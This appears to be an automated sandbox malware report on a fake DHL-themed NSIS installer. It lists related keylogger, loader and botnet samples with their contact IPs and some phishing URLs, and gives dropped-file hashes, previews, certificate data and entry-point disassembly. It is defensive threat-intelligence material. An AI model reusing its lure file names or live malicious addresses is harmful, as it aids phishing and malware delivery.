        Offer 2024-30496.exeGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.97.3
        pagamento.exeGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.97.3
        Po#70831.exeGet hashmaliciousAzorultBrowse
        • 172.67.128.117
        payment PAGO 2974749647839452.jsGet hashmaliciousUnknownBrowse
        • 162.159.130.233
        VIRPUSFedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
        • 104.153.208.178
        https://ellenlightning.slickplan.com/wa4vxper/content/svgx2f4srvbqeat19e7?language=en_USGet hashmaliciousHTMLPhisherBrowse
        • 104.153.208.178
        5oBtUcfYbD.elfGet hashmaliciousMirai, MoobotBrowse
        • 50.115.175.126
        YMloXummt3.elfGet hashmaliciousMoobotBrowse
        • 5.226.170.36
        https://click.pstmrk.it/3s/bfsdqbhdfqsbhdf.blogspot.com%2F/lvid/EsqzAQ/AQ/3d6bdb2c-8ba6-4238-a213-e9cee32f03d6/2/EhSnAlFZDV#cl/210168_smd/274/3553163/3122/3317/328533Get hashmaliciousUnknownBrowse
        • 50.115.172.236
        http://9k1.lawstore.me/?dD1jJmQ9MjIwMjUmbD01NDIzJmM9MTU5ODA5JmF1PTA=Get hashmaliciousPhisherBrowse
        • 50.115.174.138
        http://i84.lawstore.me/?dD1jJmQ9MjIwNDImbD01NDE2JmM9MTUxNDkmYXU9MA==Get hashmaliciousPhisherBrowse
        • 50.115.174.138
        Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
        • 50.115.174.254
        Invoices.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 50.115.174.254
        SecuriteInfo.com.NSIS.Injector.SPOW.tr.7679.1853.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 50.115.174.254
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3b5074b1b5d032e5620f69f9f700ff0eUpit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.12.205
        Autofill Manufacturing Sdn Bhd 28-08-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
        • 104.26.12.205
        G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
        • 104.26.12.205
        payment PAGO 2974749647839452.jsGet hashmaliciousUnknownBrowse
        • 104.26.12.205
        Great Wall Motor Sale Bank_Sift_Copy.Pdf.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
        • 104.26.12.205
        https://paquete.centrodelvaquero.com/Get hashmaliciousUnknownBrowse
        • 104.26.12.205
        QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
        • 104.26.12.205
        QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
        • 104.26.12.205
        8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
        • 104.26.12.205
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dllIMG_000071TRIAL_ORDER_CFILE.exeGet hashmaliciousFormBook, GuLoaderBrowse
          IMG_000071TRIAL_ORDER_CFILE.exeGet hashmaliciousGuLoaderBrowse
            Group roominglist.exeGet hashmaliciousRemcos, GuLoaderBrowse
              Group roominglist.exeGet hashmaliciousGuLoaderBrowse
                Group Deposit.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  Group Deposit.exeGet hashmaliciousGuLoaderBrowse
                    6nniXDa5J9.exeGet hashmaliciousGuLoaderBrowse
                      6nniXDa5J9.exeGet hashmaliciousGuLoaderBrowse
                        d8zSKMz5AH.rtfGet hashmaliciousGuLoaderBrowse
                          C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dllIMG_000071TRIAL_ORDER_CFILE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            IMG_000071TRIAL_ORDER_CFILE.exeGet hashmaliciousGuLoaderBrowse
                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                  E-dekont.exeGet hashmaliciousGuLoaderBrowse
                                    E-dekont.exeGet hashmaliciousGuLoaderBrowse
                                      334427.exeGet hashmaliciousGuLoaderBrowse
                                        334427.exeGet hashmaliciousGuLoaderBrowse
                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):323255
                                            Entropy (8bit):7.545887168406348
                                            Encrypted:false
                                            SSDEEP:6144:XKVxIfOx4Up06IQNw2v0Zg5Y5YWZktpJBHxv6B8+Pb:6Vu3QNIZg5Y56vJBHxE8k
                                            MD5:84D6A705BCAD29B3CC47B66ED0F81EA3
                                            SHA1:976253E495D0324DE4A837365D740D384D80FB21
                                            SHA-256:AB5B6D6E2237B61592466C07C66880821A55727E93A5D5E7CAF459B3FB9FA602
                                            SHA-512:46D0B74D38BC5013C92EFD31F0ED529DCF503E10FBB75AA6376205D023C10DDD7DEAD1C584D5A2BAF5B3AD0E4AFAD47C6EBEEF2BE7EB4786DDE399E2F9357A90
                                            Malicious:false
                                            Reputation:low
                                            Preview:..........H...q...ww.............................................66.&.g.n......^^...............++++...II..........z.b.............^....Q..................$.........................V..!.......a...d....................~~~.....{.&&.........................Q..........................EE....SS....zzzz........x.u....Q.ll........."..........................YY..........W...........DD.uu.[...........eee..II............l...X....++++++....qq...........................::..............^.55........<................WW.y....|..................................UU...........................((.......x......999.k..................4.... .......................3........................................!.FF..............J.`............MM.*........,..LLL.ff........>....7.........................................N..0......M.s............jj.................XX.....EE.............................GG...|................................>>>....GG...........$......0......!.....111.......Y.>.........JJJJJ.................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):119364
                                            Entropy (8bit):2.6718604457702266
                                            Encrypted:false
                                            SSDEEP:1536:je3LoloPxvDElEmo6NqwxO/ET2LhQhu/RKnVPcT/kUHxd:lhCH+78H7
                                            MD5:F4A5EE7E8AE9859033386974B2CAAF21
                                            SHA1:16CF3E84E55407F66E95291B8AE019C01354763D
                                            SHA-256:F358CCA593B5C1AE9E48B638B8C7ECEE26EAE326FD21C453068996CFC56CDA48
                                            SHA-512:A6086B90FF5E5C1D545D0E7C3E11C5A7FD89A257BE90F65FD2E1871618995EB51843A5FD8A4286011A08DB8245A159D8E1DC7D46A4E50A6A63BC1A100259A475
                                            Malicious:false
                                            Reputation:low
                                            Preview:0000D4006800060000ECEC005A5A0000000000370000710000DDDDDD0000C6C6009300CACACACA00001600000000BDBDBDBD00B9B900000000A1A1A100610088000000008B00FEFE00BEBE00000000000000E6E6008A8A00000084848484005700004343430000000000464646007777770000000000003D3D000000005100000000CECE00000000B3B3002A001100009696969600EFEFEFEFEFEFEFEFEF0000FE00000000A8A8A80000004848008B8B8B8B8B8B8B8B00DD002C00000059002A2A007800620000585858000000000000050505050000D0D0D0000000008E8E8E8E00F3000000858500000000C300003D0000004A002B00A1A1A1A10000808000606000B3000033330000888888880000F8F800CFCFCF002100100000A6004200C70000000C0C000000004D4D000088880099000000530000C5003200E0E000C6C6C6C60000000000D2000F0F004A4A4A00330071710000B800007F00000080009E0000808080000000A200555500000000005F5F0000000000000000000000000000CD000000004200000000D4D4D40000009D9D9D0000858500C2000000340000009B9B00F30000191919190000B200009A001A0000000000ADADAD00000000979797000000C90000FAFA000000000D00040024242424000000610000009E9E9E9E00585858585800970000FD0000BBBBBBBBBB
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):656
                                            Entropy (8bit):4.2745958598753875
                                            Encrypted:false
                                            SSDEEP:12:PuoLi5hEScE7GtCAx3xD879eOefQigajRaAq7BqTDwEq4:2oG5CS17GtDxB8BedBhjMAqNODh
                                            MD5:FB02EC3717A94D29AF3D0AD98450C2DC
                                            SHA1:633A8E051D7470C2197E17A1A35ACF191D4E09C1
                                            SHA-256:4942327C34401AF45DC4358B97F57162630A13CC616300F16D2A74BA50BAE83B
                                            SHA-512:098EFD8A7E70D23BF2784782E61AB359CF896081A2E82A61488977FACFF89D4C42CFFDD64763B8529397EBBB5DD39E4669E5103A87E5E9DA0D6451D69917DD7E
                                            Malicious:false
                                            Reputation:low
                                            Preview:gingerin velgrendes abye frstebehandling medaljernes heins approbator.blunderful hngekje indenrigsministeriums behovsdefinition ossie,loyaliteterne binaries diskretionshensyn farveskalaernes bibeskftigelse scrawniness ministrike crossties indexed selvovervurderingen stevnsboer..nonsustenance kodesekvensers tecnoctonia kunstvrkers endepunktets sexappeal scratchweed octaval fascismes hardin oxyphonia genskabning leveattest..hjulskruer staphylorrhaphies rulningerne blgebevgelser plagiarisms,subtrochleariform arbejdssgningers strstedelene reinforced mythopeic hstende filantrop mitsumata objectionableness tamponade abortlovgivning scorchers manslayers..
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 633825300114114700748351602688.000000
                                            Category:dropped
                                            Size (bytes):469246
                                            Entropy (8bit):1.2546503643807034
                                            Encrypted:false
                                            SSDEEP:1536:gNlu1wJYkowzGi1M2aEmonX42/xUIB3HPG6/tWp0R:u5jzGiwE5fL9Heyq
                                            MD5:10D8F1FD0918D6C476FF604D2C5F4465
                                            SHA1:97F0C46CB5431E0DA6FD608B293ED1743AC0E24E
                                            SHA-256:FF3FAEFB975B108BE6608610BFDD9965B3C3DC72B397048FF2F1B31952FF10A1
                                            SHA-512:843E48813E18047413DA0C81F7116A180BDD61CFAC0B05E7BD98492BCBB1CB0ADACE4DDA2557D791BE2A4F040210D7B62C6B94F066254074B74D5CFADAB6B3CE
                                            Malicious:false
                                            Reputation:low
                                            Preview:1.............\...........................A.......R........K..}................................................................k...............................................;.......................................~....................................................................................@........................K............................1............\..........................................G..............................................w..........\...........................................J......................8.................W......................>.*......................7......M............................}..........K......,..........................................................|i.............F.................................................k........O.....P.........i..............................................T...................................................................|................................................................................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):494046
                                            Entropy (8bit):1.2584065451759774
                                            Encrypted:false
                                            SSDEEP:1536:c5fWsFOPlxRovk2kW9vuPmTgWv6Y9o4lWwpMMTr:cOxd5VPmTg0FWWTr
                                            MD5:D9F3FD1BC763A4D624EDC17866215411
                                            SHA1:5AFDB453C6FE0FFCFDEE93DA52D0BA14A549B968
                                            SHA-256:4B19F668682E689EB04E1660E7D460EC930AFB02B9575B08DD4F7DFAFBE80CB3
                                            SHA-512:199DFC75D0833CC5E0CC9C3DD7A657C977E231D04B0469D5D4F61F2FDDE68251FAB265075F697FD4DF8C38BBF22207E0AF41C6EBD201999FBFC31D2F04243E6A
                                            Malicious:false
                                            Preview:.............................a.....o..........................................................................@........................................w............................{............G..............................................n......................................................8................E.......C.............................................c.................................................................................R........?....................>.....P....o.................................................................................4....................................z.............'..............5......../....................................................................................3.........3..................f........(...................o.........P........2..................~...................................................................................................4.......+.......y.....................................................G..
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):429377
                                            Entropy (8bit):1.2599194991036493
                                            Encrypted:false
                                            SSDEEP:768:VVF0SYjksWsqDFm3w3YVTMW98+6IUcs2unwOcyJFsShTRrcDQX+zAW07zLMDlRcK:aiRYCGccIyQHR8g9mPok0rJWSLAkBGsw
                                            MD5:E7BA44668E47A459499CB825D5DB2C9B
                                            SHA1:CB583A51F7E1172C60CF74D40FC84504EB3A2B30
                                            SHA-256:E33D80912DBE44DF9047FEDD640217600F651B2048DE82EBE7256C2B5BB717CF
                                            SHA-512:E342A0A0B63928A962DB8A65E5028A7FBEFE4D88B825870436ACED951110F04B77FBEB2AC0DD52153A6A175123A8D875DDB208204715B81395B3C699608882DC
                                            Malicious:false
                                            Preview:.......a.................R................................................................................................I......................!..............................................)..................................E.....P........................a............................H...\....................u.......................H..............4..........M..........................................................................b.......6.................................._...^..........4.............T....................i......1................................................/....................|......A..................... .............................T...............rQ.....................*........y...................(V..............................................................*................9.......... .....f............y................G.......................................................V..........<5.........j...........................................Y..........*....
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:OpenPGP Secret Key
                                            Category:dropped
                                            Size (bytes):1879665
                                            Entropy (8bit):3.1562077804085447
                                            Encrypted:false
                                            SSDEEP:12288:8wwP7KVu3QNIZg5Y56vJBHxE8hCI8HS2J9Am:SO6QNIKLDx/mJ9l
                                            MD5:7AB7159A6E7314A2608D56494BC42D56
                                            SHA1:5632CAA035439F5F938D32BA47FE20665275B040
                                            SHA-256:E109CE6C9AF455A7BC6D3072C874B8A1BB6C9E13AA2F5CD453D9878A3EA94A59
                                            SHA-512:AF4B3937812872255CBF6E60029300B3B5DCD80A61B56C1097C69F2BE29CB30C357E3345583664788C05D04900AA23BE46A421A0607AE4F826C1B8A250EC64AD
                                            Malicious:false
                                            Preview:.f......,........................B......<e.......f..........................................................................................................................................................................................................................................G...[...............j...............................................................................................................................m...............................................................(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):5632
                                            Entropy (8bit):3.8155439565923523
                                            Encrypted:false
                                            SSDEEP:48:S46+/fTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mjsofjLl:zRuPbOBtWZBV8jAWiAJCdv2Cmj/L
                                            MD5:F1E9EED02DB3A822A7DDEF0C724E5F1F
                                            SHA1:65864992F5B6C79C5EFBEFB5B1354648A8A86709
                                            SHA-256:6DFF504C6759C418C6635C9B25B8C91D0D9EF7787A3A93610D7670BB563C09DF
                                            SHA-512:C22B64FFF76B25CF53231B8636F07B361D95791C4646787CE7BEAC27AD6A0DE88337DCCEB25B5196F97C452DDA72E2614647F51A8A18CB4D5228A82ED2E0780C
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                            Joe Sandbox View:
                                            • Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse
                                            • Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse
                                            • Filename: Group roominglist.exe, Detection: malicious, Browse
                                            • Filename: Group roominglist.exe, Detection: malicious, Browse
                                            • Filename: Group Deposit.exe, Detection: malicious, Browse
                                            • Filename: Group Deposit.exe, Detection: malicious, Browse
                                            • Filename: 6nniXDa5J9.exe, Detection: malicious, Browse
                                            • Filename: 6nniXDa5J9.exe, Detection: malicious, Browse
                                            • Filename: d8zSKMz5AH.rtf, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....MX...........!........."......?........ ...............................p......................................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):11776
                                            Entropy (8bit):5.656065698421856
                                            Encrypted:false
                                            SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                            MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                            SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                            SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                            SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                            Joe Sandbox View:
                                            • Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse
                                            • Filename: IMG_000071TRIAL_ORDER_CFILE.exe, Detection: malicious, Browse
                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                            • Filename: E-dekont.exe, Detection: malicious, Browse
                                            • Filename: E-dekont.exe, Detection: malicious, Browse
                                            • Filename: 334427.exe, Detection: malicious, Browse
                                            • Filename: 334427.exe, Detection: malicious, Browse
                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):966
                                            Entropy (8bit):3.3304475663195983
                                            Encrypted:false
                                            SSDEEP:24:8q/BTDHoY7lLYXE+mDuILP8izZMKt2bIJT:8mhDB7lLYqDuILUiNMKtEaT
                                            MD5:B64C989278CF77931116021426CD1705
                                            SHA1:2A8932000438062EAC6459613AEAB82EB55CFFDE
                                            SHA-256:A7D39EB2DF56F911566CE3C5DE6C74584AA05DB8DB00697ABD3CB6E373B9E301
                                            SHA-512:A465BC18BF67E535753A7ED01444DA3903A80A3197D81E735E4BE0B81665B7A2DB01E07CEB994959C3C276DACA7DAEFA413AF767B30420FC3E11440FE35D123B
                                            Malicious:false
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....V.1...........vlgerne.@............................................v.l.g.e.r.n.e.....z.2...........construction.Bes231.X............................................c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1..."...2.....\.....\.....\.W.i.n.d.o.w.s.\.F.o.n.t.s.\.v.l.g.e.r.n.e.\.c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1.Q.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.z.o.n.i.t.o.i.d.e.s.\.s.u.e.v.e.\.n.d.s.a.g.e.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):966
                                            Entropy (8bit):3.3304475663195983
                                            Encrypted:false
                                            SSDEEP:24:8q/BTDHoY7lLYXE+mDuILP8izZMKt2bIJT:8mhDB7lLYqDuILUiNMKtEaT
                                            MD5:B64C989278CF77931116021426CD1705
                                            SHA1:2A8932000438062EAC6459613AEAB82EB55CFFDE
                                            SHA-256:A7D39EB2DF56F911566CE3C5DE6C74584AA05DB8DB00697ABD3CB6E373B9E301
                                            SHA-512:A465BC18BF67E535753A7ED01444DA3903A80A3197D81E735E4BE0B81665B7A2DB01E07CEB994959C3C276DACA7DAEFA413AF767B30420FC3E11440FE35D123B
                                            Malicious:false
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....V.1...........vlgerne.@............................................v.l.g.e.r.n.e.....z.2...........construction.Bes231.X............................................c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1..."...2.....\.....\.....\.W.i.n.d.o.w.s.\.F.o.n.t.s.\.v.l.g.e.r.n.e.\.c.o.n.s.t.r.u.c.t.i.o.n...B.e.s.2.3.1.Q.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.z.o.n.i.t.o.i.d.e.s.\.s.u.e.v.e.\.n.d.s.a.g.e.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                            Process:C:\Users\user\Desktop\DHL Page1.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):1260
                                            Entropy (8bit):3.1709256470442693
                                            Encrypted:false
                                            SSDEEP:12:8wl0ysXUCV/tz+7RafgKDYWKJpOelwWrhQ1zt6wWnIQ1olfW+kjcmA6ciKg/rNJG:85raRMgKVK2ZLdkizZMK45HALJT
                                            MD5:3F64CCF6FFEFD40D1D5E387E17C194BF
                                            SHA1:024C41EC4E36FB476E15B3E001727F8F4E738505
                                            SHA-256:38C2554E98A09DA762D45388519A201AEC4849206F3966F30B0CC634F5DBA19F
                                            SHA-512:A69EB3C48C3D07BAE4871DD3911186B98FC996FDBA6FD3B10C3977134C9A58C593A5F834E160BA220FD9AE56427A6763B6BCFBA7E937D3B4F4AB256EEEA09FA8
                                            Malicious:false
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....r.1...........uddannelsesfiler..R............................................u.d.d.a.n.n.e.l.s.e.s.f.i.l.e.r... .l.2...........Maaneraket.uds..N............................................M.a.a.n.e.r.a.k.e.t...u.d.s.......E.....\.....\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.u.d.d.a.n.n.e.l.s.e.s.f.i.l.e.r.\.M.a.a.n.e.r.a.k.e.t...u.d.s.Q.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.629212621346839
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:DHL Page1.exe
                                            File size:909'168 bytes
                                            MD5:e563153089b05a25e30db0a73e196b10
                                            SHA1:fb098be6dc900c18c83b53681cc0fd2c976fe638
                                            SHA256:dbd76943d4c2efa432805b8458e970c2b6c6d76c16ff4d2a7d63df50ad0330af
                                            SHA512:17e30159b45bfcdd51060402035df22aac990462f2cd6030d5a706365334324972516beb206e061250f22bea6d5c559c2f607bf47742612dcae03f909c959b0d
                                            SSDEEP:24576:eJi2vF8oJn4gGSBy/65Sq+6tOhMAP63ACF25:eh8oF/G//6c6+MAP6bW
                                            TLSH:7A15EF907DE4B46FF1E1CA3D4A96841F1A872E1B5AF08F4FB25DBBCA26701434C96358
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...F.MX.................f..........l4............@
                                            Icon Hash:0bd9d964726e211f
                                            Entrypoint:0x40346c
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x584DCA46 [Sun Dec 11 21:51:02 2016 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                            Signature Valid:false
                                            Signature Issuer:CN="Overdepends Desertification Jinked ", O=Crappo, L=Veitsbronn, S=Bayern, C=DE
                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                            Error Number:-2146762487
                                            Not Before, Not After
                                            • 14/09/2023 09:05:14 13/09/2026 09:05:14
                                            Subject Chain
                                            • CN="Overdepends Desertification Jinked ", O=Crappo, L=Veitsbronn, S=Bayern, C=DE
                                            Version:3
                                            Thumbprint MD5:6EAB2E96B6451EEAD5EC98AEBBC51F69
                                            Thumbprint SHA-1:04B4609FD50473998E5EF2496F1F8ED25531D5CD
                                            Thumbprint SHA-256:4D4B0CAF16F20FD81B1F814A84F7F6409CB375BEDE279A0DC10EAB6BB3AB595D
                                            Serial:66D66CF9023599E17F142E57C673717975E72549
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A230h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080B4h]
                                            call dword ptr [004080B0h]
                                            cmp ax, 00000006h
                                            je 00007FB34D09C153h
                                            push ebx
                                            call 00007FB34D09F2ACh
                                            cmp eax, ebx
                                            je 00007FB34D09C149h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B8h
                                            push esi
                                            call 00007FB34D09F226h
                                            push esi
                                            call dword ptr [0040815Ch]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007FB34D09C12Ch
                                            push ebp
                                            push 00000009h
                                            call 00007FB34D09F27Eh
                                            push 00000007h
                                            call 00007FB34D09F277h
                                            mov dword ptr [00434F24h], eax
                                            call dword ptr [0040803Ch]
                                            push ebx
                                            call dword ptr [004082A4h]
                                            mov dword ptr [00434FD8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 0042B248h
                                            call dword ptr [00408188h]
                                            push 0040A384h
                                            push 00433F20h
                                            call 00007FB34D09EE60h
                                            call dword ptr [004080ACh]
                                            mov ebp, 00440000h
                                            push eax
                                            push ebp
                                            call 00007FB34D09EE4Eh
                                            push ebx
                                            call dword ptr [00408174h]
                                            add word ptr [eax], 0000h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x428f8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xdcc800x12f0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
